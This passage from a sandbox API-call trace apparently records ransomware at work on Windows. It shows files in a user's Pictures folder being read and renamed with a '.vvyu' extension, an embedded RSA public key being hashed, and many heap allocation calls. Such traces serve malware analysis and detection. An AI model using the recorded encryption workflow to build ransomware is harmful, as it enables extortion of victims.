(HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.939] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.939] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.939] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.939] CloseHandle (hObject=0x568) returned 1 [0194.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0194.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0194.942] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\77x _hI5d64N725mY.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\77x _hi5d64n725my.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\77x _hI5d64N725mY.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\77x _hi5d64n725my.bmp.vvyu")) returned 1 [0194.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.943] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.946] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x430299f0, ftCreationTime.dwHighDateTime=0x1d8a088, ftLastAccessTime.dwLowDateTime=0x7e219da0, ftLastAccessTime.dwHighDateTime=0x1d8a390, ftLastWriteTime.dwLowDateTime=0x7e219da0, ftLastWriteTime.dwHighDateTime=0x1d8a390, nFileSizeHigh=0x0, nFileSizeLow=0xcfaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bQiz44uQ681_7Dctbgxp.jpg", cAlternateFileName="BQIZ44~1.JPG")) returned 1 [0194.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1188 [0194.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1188 | out: hHeap=0x620000) returned 1 [0194.947] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\bQiz44uQ681_7Dctbgxp.jpg") returned=".jpg" [0194.947] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\bQiz44uQ681_7Dctbgxp.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\bqiz44uq681_7dctbgxp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.947] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=53167) returned 1 [0194.947] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.950] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xcf89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.950] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.952] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.952] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xcfaf, lpOverlapped=0x0) returned 1 [0194.953] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.953] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.953] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.953] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.955] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.955] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.955] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.955] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.955] GetLastError () returned 0x0 [0194.955] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.955] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.955] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.955] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.955] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xcfb0) returned 0x2ea79b0 [0194.956] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1188 [0194.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea11d0 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.957] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0194.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c00 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2be8 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0194.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0194.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.960] GetCurrentThreadId () returned 0x66c [0194.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0340 [0194.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.961] GetCurrentThreadId () returned 0x66c [0194.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0194.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c00 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c60 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c78 [0194.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c18 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2be8 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0194.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea11d0 | out: hHeap=0x620000) returned 1 [0194.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.972] HeapFree 